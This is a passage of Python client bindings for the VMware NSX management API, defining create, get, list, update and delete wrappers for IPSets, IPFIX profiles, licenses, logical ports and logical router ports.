        :param ip_set_id: IPSet Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.IPSet`
        :return: com.vmware.nsx.model.IPSet
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ip_set_id': ip_set_id}
        return self._invoke('get', args)

    def list(self, cursor=None, included_fields=None, page_size=None,
             sort_ascending=None, sort_by=None):
        """
        Return a paginated list of IPSets.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should
            be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.IPSetListResult`
        :return: com.vmware.nsx.model.IPSetListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)

    def update(self, ip_set_id, ip_set):
        """
        Update the specified IPSet. Modifiable parameters include
        description, display_name and ip_addresses.

        :type  ip_set_id: :class:`str`
        :param ip_set_id: IPSet Id (required)
        :type  ip_set: :class:`com.vmware.nsx.model_client.IPSet`
        :param ip_set: (required)
        :rtype: :class:`com.vmware.nsx.model_client.IPSet`
        :return: com.vmware.nsx.model.IPSet
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'ip_set_id': ip_set_id,
            'ip_set': ip_set,
        }
        return self._invoke('update', args)
class IpfixCollectorProfiles(VapiInterface):
    """
    API service for managing IPFIX collector profiles.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_collector_profiles'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _IpfixCollectorProfilesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ipfix_collector_upm_profile):
        """
        Create a new IPFIX collector profile with essential properties.

        :type  ipfix_collector_upm_profile: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
        :param ipfix_collector_upm_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
        :return: com.vmware.nsx.model.IpfixCollectorUpmProfile
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_collector_upm_profile': ipfix_collector_upm_profile}
        return self._invoke('create', args)

    def delete(self, ipfix_collector_profile_id):
        """
        Delete an existing IPFIX collector profile by ID.

        :type  ipfix_collector_profile_id: :class:`str`
        :param ipfix_collector_profile_id: (required)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_collector_profile_id': ipfix_collector_profile_id}
        return self._invoke('delete', args)

    def get(self, ipfix_collector_profile_id):
        """
        Get an existing IPFIX collector profile by profile ID.

        :type  ipfix_collector_profile_id: :class:`str`
        :param ipfix_collector_profile_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
        :return: com.vmware.nsx.model.IpfixCollectorUpmProfile
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_collector_profile_id': ipfix_collector_profile_id}
        return self._invoke('get', args)

    def list(self, cursor=None, included_fields=None, page_size=None,
             profile_types=None, sort_ascending=None, sort_by=None):
        """
        Query IPFIX collector profiles with list parameters. The result can
        be filtered by profile type as defined by
        IpfixCollectorUpmProfileType.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should
            be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  profile_types: :class:`str` or ``None``
        :param profile_types: IPFIX Collector Profile Type List (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfileListResult`
        :return: com.vmware.nsx.model.IpfixCollectorUpmProfileListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'profile_types': profile_types,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)

    def update(self, ipfix_collector_profile_id, ipfix_collector_upm_profile):
        """
        Update an existing IPFIX collector profile with profile ID and
        modified properties.

        :type  ipfix_collector_profile_id: :class:`str`
        :param ipfix_collector_profile_id: (required)
        :type  ipfix_collector_upm_profile: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
        :param ipfix_collector_upm_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
        :return: com.vmware.nsx.model.IpfixCollectorUpmProfile
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'ipfix_collector_profile_id': ipfix_collector_profile_id,
            'ipfix_collector_upm_profile': ipfix_collector_upm_profile,
        }
        return self._invoke('update', args)
class IpfixObsPoints(VapiInterface):
    """
    API service for IPFIX observation points (deprecated).
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_obs_points'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _IpfixObsPointsStub)
        self._VAPI_OPERATION_IDS = {}

    def list(self):
        """
        Deprecated - please use /ipfix-profiles for switch IPFIX profiles
        and /ipfix-collector-profiles for IPFIX collector profiles.

        :rtype: :class:`com.vmware.nsx.model_client.IpfixObsPointsListResult`
        :return: com.vmware.nsx.model.IpfixObsPointsListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        # Operation takes no input payload.
        return self._invoke('list', None)
class IpfixProfiles(VapiInterface):
    """
    API service for managing IPFIX (switch) profiles.
    """
    LIST_APPLIED_TO_ENTITY_TYPE_LOGICALPORT = "LogicalPort"
    """
    Possible value for ``appliedToEntityType`` of method
    :func:`IpfixProfiles.list`.
    """
    LIST_APPLIED_TO_ENTITY_TYPE_LOGICALSWITCH = "LogicalSwitch"
    """
    Possible value for ``appliedToEntityType`` of method
    :func:`IpfixProfiles.list`.
    """
    LIST_APPLIED_TO_ENTITY_TYPE_NSGROUP = "NSGroup"
    """
    Possible value for ``appliedToEntityType`` of method
    :func:`IpfixProfiles.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_profiles'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _IpfixProfilesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ipfix_upm_profile):
        """
        Create a new IPFIX profile with essential properties.

        :type  ipfix_upm_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param ipfix_upm_profile: (required) Must contain all the attributes
            defined in :class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.IpfixUpmProfile — the return value
            contains all the attributes defined in
            :class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_upm_profile': ipfix_upm_profile}
        return self._invoke('create', args)

    def delete(self, ipfix_profile_id):
        """
        Delete an existing IPFIX profile by ID.

        :type  ipfix_profile_id: :class:`str`
        :param ipfix_profile_id: (required)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_profile_id': ipfix_profile_id}
        return self._invoke('delete', args)

    def get(self, ipfix_profile_id):
        """
        Get an existing IPFIX profile by profile ID.

        :type  ipfix_profile_id: :class:`str`
        :param ipfix_profile_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.IpfixUpmProfile — the return value
            contains all the attributes defined in
            :class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'ipfix_profile_id': ipfix_profile_id}
        return self._invoke('get', args)

    def list(self, applied_to_entity_id=None, applied_to_entity_type=None,
             cursor=None, included_fields=None, page_size=None,
             profile_types=None, sort_ascending=None, sort_by=None):
        """
        Query IPFIX profiles with list parameters. The result can be
        filtered by profile type as defined by IpfixUpmProfileType.

        :type  applied_to_entity_id: :class:`str` or ``None``
        :param applied_to_entity_id: ID of Entity Applied with Profile
            (optional)
        :type  applied_to_entity_type: :class:`str` or ``None``
        :param applied_to_entity_type: Supported Entity Types (optional);
            see the ``LIST_APPLIED_TO_ENTITY_TYPE_*`` class constants.
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should
            be included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  profile_types: :class:`str` or ``None``
        :param profile_types: IPFIX Profile Type List (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.IpfixUpmProfileListResult`
        :return: com.vmware.nsx.model.IpfixUpmProfileListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'applied_to_entity_id': applied_to_entity_id,
            'applied_to_entity_type': applied_to_entity_type,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'profile_types': profile_types,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', args)

    def update(self, ipfix_profile_id, ipfix_upm_profile):
        """
        Update an existing IPFIX profile with profile ID and modified
        properties.

        :type  ipfix_profile_id: :class:`str`
        :param ipfix_profile_id: (required)
        :type  ipfix_upm_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param ipfix_upm_profile: (required) Must contain all the attributes
            defined in :class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.IpfixUpmProfile — the return value
            contains all the attributes defined in
            :class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'ipfix_profile_id': ipfix_profile_id,
            'ipfix_upm_profile': ipfix_upm_profile,
        }
        return self._invoke('update', args)
class Licenses(VapiInterface):
    """
    API service for managing NSX license keys.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.licenses'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _LicensesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, license):
        """
        Add a license key to the system. Only one license key is supported
        per license edition type - Standard, Advanced or Enterprise. Adding
        a new key for an edition whose key already exists results in an
        error.

        :type  license: :class:`com.vmware.nsx.model_client.License`
        :param license: (required)
        :rtype: :class:`com.vmware.nsx.model_client.License`
        :return: com.vmware.nsx.model.License
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'license': license}
        return self._invoke('create', args)

    def delete(self, license_key):
        """
        Deprecated. Use POST /licenses?action=delete API instead.

        :type  license_key: :class:`str`
        :param license_key: (required)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'license_key': license_key}
        return self._invoke('delete', args)

    def delete_0(self, license):
        """
        Delete the license key identified in the request body by
        "license_key", along with its properties. Attempting to delete the
        last license key results in an error.

        :type  license: :class:`com.vmware.nsx.model_client.License`
        :param license: (required)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'license': license}
        return self._invoke('delete_0', args)

    def get(self):
        """
        Deprecated. Use the GET /licenses API instead.

        :rtype: :class:`com.vmware.nsx.model_client.License`
        :return: com.vmware.nsx.model.License
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        # Operation takes no input payload.
        return self._invoke('get', None)

    def getlicensebykey(self, license_key):
        """
        Deprecated. Use GET /licenses API instead.

        :type  license_key: :class:`str`
        :param license_key: (required)
        :rtype: :class:`com.vmware.nsx.model_client.License`
        :return: com.vmware.nsx.model.License
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'license_key': license_key}
        return self._invoke('getlicensebykey', args)

    def list(self):
        """
        Return all licenses.

        :rtype: :class:`com.vmware.nsx.model_client.LicensesListResult`
        :return: com.vmware.nsx.model.LicensesListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        # Operation takes no input payload.
        return self._invoke('list', None)

    def update(self, license):
        """
        Deprecated. Use the POST /licenses API instead.

        :type  license: :class:`com.vmware.nsx.model_client.License`
        :param license: (required)
        :rtype: :class:`com.vmware.nsx.model_client.License`
        :return: com.vmware.nsx.model.License
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'license': license}
        return self._invoke('update', args)
class LogicalPorts(VapiInterface):
    """
    API service for managing logical switch ports.
    """
    LIST_ATTACHMENT_TYPE_VIF = "VIF"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_LOGICALROUTER = "LOGICALROUTER"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_BRIDGEENDPOINT = "BRIDGEENDPOINT"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_DHCP_SERVICE = "DHCP_SERVICE"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_METADATA_PROXY = "METADATA_PROXY"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_L2VPN_SESSION = "L2VPN_SESSION"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    LIST_ATTACHMENT_TYPE_NONE = "NONE"
    """
    Possible value for ``attachmentType`` of method :func:`LogicalPorts.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.logical_ports'
    """
    Identifier of the service in canonical form.
    """

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used to construct the underlying stub.
        """
        VapiInterface.__init__(self, config, _LogicalPortsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, logical_port):
        """
        Create a new logical switch port. Required parameters are the
        associated logical_switch_id and admin_state (UP or DOWN); optional
        parameters are the attachment and switching_profile_ids. Without
        switching_profile_ids, default switching profiles are assigned to
        the port; without an attachment, the switch port remains empty. To
        configure an attachment you must specify an id, and optionally an
        attachment_type (VIF or LOGICALROUTER; VIF by default).

        :type  logical_port: :class:`com.vmware.nsx.model_client.LogicalPort`
        :param logical_port: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
        :return: com.vmware.nsx.model.LogicalPort
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'logical_port': logical_port}
        return self._invoke('create', args)

    def delete(self, lport_id, detach=None):
        """
        Delete the specified logical switch port. By default deletion fails
        if the port has attachments or belongs to an NSGroup; the ``detach``
        option forces the deletion.

        :type  lport_id: :class:`str`
        :param lport_id: (required)
        :type  detach: :class:`bool` or ``None``
        :param detach: force delete even if attached or referenced by a
            group (optional, default to false)
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'lport_id': lport_id,
            'detach': detach,
        }
        return self._invoke('delete', args)

    def get(self, lport_id):
        """
        Return information about a specified logical port.

        :type  lport_id: :class:`str`
        :param lport_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
        :return: com.vmware.nsx.model.LogicalPort
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {'lport_id': lport_id}
        return self._invoke('get', args)

    def list(self, attachment_id=None, attachment_type=None,
             bridge_cluster_id=None, container_ports_only=None, cursor=None,
             diagnostic=None, included_fields=None, logical_switch_id=None,
             page_size=None, parent_vif_id=None, sort_ascending=None,
             sort_by=None, switching_profile_id=None, transport_node_id=None,
             transport_zone_id=None):
        """
        Return information about all configured logical switch ports.
        Logical switch ports connect to VM virtual network interface cards
        (NICs); each logical port is associated with one logical switch.

        :type  attachment_id: :class:`str` or ``None``
        :param attachment_id: Logical Port attachment Id (optional)
        :type  attachment_type: :class:`str` or ``None``
        :param attachment_type: Type of attachment for logical port; for
            query only. (optional) See the ``LIST_ATTACHMENT_TYPE_*`` class
            constants.
        :type  bridge_cluster_id: :class:`str` or ``None``
        :param bridge_cluster_id: Bridge Cluster identifier (optional)
        :type  container_ports_only: :class:`bool` or ``None``
        :param container_ports_only: Only container VIF logical ports will
            be returned if true (optional, default to false)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  diagnostic: :class:`bool` or ``None``
        :param diagnostic: Flag to enable showing of transit logical port.
            (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should
            be included in query result (optional)
        :type  logical_switch_id: :class:`str` or ``None``
        :param logical_switch_id: Logical Switch identifier (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  parent_vif_id: :class:`str` or ``None``
        :param parent_vif_id: ID of the VIF of type PARENT (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  switching_profile_id: :class:`str` or ``None``
        :param switching_profile_id: Network Profile identifier (optional)
        :type  transport_node_id: :class:`str` or ``None``
        :param transport_node_id: Transport node identifier (optional)
        :type  transport_zone_id: :class:`str` or ``None``
        :param transport_zone_id: Transport zone identifier (optional)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalPortListResult`
        :return: com.vmware.nsx.model.LogicalPortListResult
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'attachment_id': attachment_id,
            'attachment_type': attachment_type,
            'bridge_cluster_id': bridge_cluster_id,
            'container_ports_only': container_ports_only,
            'cursor': cursor,
            'diagnostic': diagnostic,
            'included_fields': included_fields,
            'logical_switch_id': logical_switch_id,
            'page_size': page_size,
            'parent_vif_id': parent_vif_id,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'switching_profile_id': switching_profile_id,
            'transport_node_id': transport_node_id,
            'transport_zone_id': transport_zone_id,
        }
        return self._invoke('list', args)

    def update(self, lport_id, logical_port):
        """
        Modify an existing logical switch port. Parameters that can be
        modified include attachment_type (LOGICALROUTER, VIF), admin_state
        (UP or DOWN), attachment id and switching_profile_ids. The
        logical_switch_id cannot be modified — an existing port cannot be
        moved from one switch to another.

        :type  lport_id: :class:`str`
        :param lport_id: (required)
        :type  logical_port: :class:`com.vmware.nsx.model_client.LogicalPort`
        :param logical_port: (required)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalPort`
        :return: com.vmware.nsx.model.LogicalPort
        :raise: ServiceUnavailable, InvalidRequest, InternalServerError,
            Unauthorized or NotFound
            (see :mod:`com.vmware.vapi.std.errors_client`).
        """
        args = {
            'lport_id': lport_id,
            'logical_port': logical_port,
        }
        return self._invoke('update', args)
class LogicalRouterPorts(VapiInterface):
    """
    Bindings for the ``com.vmware.nsx.logical_router_ports`` vAPI service,
    providing create/read/update/delete/list operations on NSX logical
    router ports.
    """

    # Accepted values for the ``resource_type`` filter of
    # :func:`LogicalRouterPorts.list`.
    LIST_RESOURCE_TYPE_LOGICALROUTERUPLINKPORT = "LogicalRouterUpLinkPort"
    LIST_RESOURCE_TYPE_LOGICALROUTERDOWNLINKPORT = "LogicalRouterDownLinkPort"
    LIST_RESOURCE_TYPE_LOGICALROUTERLINKPORTONTIER0 = "LogicalRouterLinkPortOnTIER0"
    LIST_RESOURCE_TYPE_LOGICALROUTERLINKPORTONTIER1 = "LogicalRouterLinkPortOnTIER1"
    LIST_RESOURCE_TYPE_LOGICALROUTERLOOPBACKPORT = "LogicalRouterLoopbackPort"
    LIST_RESOURCE_TYPE_LOGICALROUTERIPTUNNELPORT = "LogicalRouterIPTunnelPort"
    LIST_RESOURCE_TYPE_LOGICALROUTERCENTRALIZEDSERVICEPORT = "LogicalRouterCentralizedServicePort"

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.logical_router_ports'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration used for creating the underlying stub.
        """
        VapiInterface.__init__(self, config, _LogicalRouterPortsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, logical_router_port):
        """
        Creates a logical router port. The payload must supply resource_type
        (LogicalRouterUpLinkPort, LogicalRouterDownLinkPort,
        LogicalRouterLinkPort, LogicalRouterLoopbackPort,
        LogicalRouterCentralizedServicePort) and logical_router_id (the
        router to which the port is assigned); service_bindings is optional.

        :type  logical_router_port: :class:`vmware.vapi.struct.VapiStruct`
        :param logical_router_port: Struct carrying all the attributes of
            :class:`com.vmware.nsx.model_client.LogicalRouterPort`. (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.LogicalRouterPort, carrying all the
            attributes of
            :class:`com.vmware.nsx.model_client.LogicalRouterPort`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_router_port': logical_router_port}
        return self._invoke('create', payload)

    def delete(self, logical_router_port_id, cascade_delete_linked_ports=None, force=None):
        """
        Deletes the specified logical router port. Logical router ports must
        be deleted before the associated logical router can be deleted. To
        delete a Tier0 router link port, first delete the attached Tier1
        router link port, or pass force=true as a query parameter to
        force-delete the Tier0 router link port.

        :type  logical_router_port_id: :class:`str`
        :param logical_router_port_id: (required)
        :type  cascade_delete_linked_ports: :class:`bool` or ``None``
        :param cascade_delete_linked_ports: Whether to also delete related
            logical switch ports (optional, default to false)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'logical_router_port_id': logical_router_port_id,
            'cascade_delete_linked_ports': cascade_delete_linked_ports,
            'force': force,
        }
        return self._invoke('delete', payload)

    def get(self, logical_router_port_id):
        """
        Returns information about the specified logical router port.

        :type  logical_router_port_id: :class:`str`
        :param logical_router_port_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.LogicalRouterPort, carrying all the
            attributes of
            :class:`com.vmware.nsx.model_client.LogicalRouterPort`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'logical_router_port_id': logical_router_port_id}
        return self._invoke('get', payload)

    def list(self, cursor=None, included_fields=None, logical_router_id=None,
             logical_switch_id=None, page_size=None, resource_type=None,
             sort_ascending=None, sort_by=None):
        """
        Returns information about all logical router ports: the
        resource_type (LogicalRouterUpLinkPort, LogicalRouterDownLinkPort,
        LogicalRouterLinkPort, LogicalRouterLoopbackPort,
        LogicalRouterCentralizedServicePort), logical_router_id (the router
        to which each port is assigned), and any service_bindings (such as a
        DHCP relay service). The request may be filtered by
        logical_router_id or logical_switch_id.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor for the next page of records, as
            supplied by the current result page (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields to include in
            the query result (optional)
        :type  logical_router_id: :class:`str` or ``None``
        :param logical_router_id: Logical Router identifier (optional)
        :type  logical_switch_id: :class:`str` or ``None``
        :param logical_switch_id: Logical Switch identifier (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results per page; the server may
            return fewer (optional, default to 1000)
        :type  resource_type: :class:`str` or ``None``
        :param resource_type: Resource types of logical router port (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.LogicalRouterPortListResult`
        :return: com.vmware.nsx.model.LogicalRouterPortListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'logical_router_id': logical_router_id,
            'logical_switch_id': logical_switch_id,
            'page_size': page_size,
            'resource_type': resource_type,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)

    def update(self, logical_router_port_id, logical_router_port):
        """
        Modifies the specified logical router port. Required payload
        parameters are resource_type and logical_router_id. Modifiable
        parameters are the resource_type (LogicalRouterUpLinkPort,
        LogicalRouterDownLinkPort, LogicalRouterLinkPort,
        LogicalRouterLoopbackPort, LogicalRouterCentralizedServicePort),
        logical_router_id (to reassign the port to a different router), and
        service_bindings.

        :type  logical_router_port_id: :class:`str`
        :param logical_router_port_id: (required)
        :type  logical_router_port: :class:`vmware.vapi.struct.VapiStruct`
        :param logical_router_port: Struct carrying all the attributes of
            :class:`com.vmware.nsx.model_client.LogicalRouterPort`. (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.LogicalRouterPort, carrying all the
            attributes of
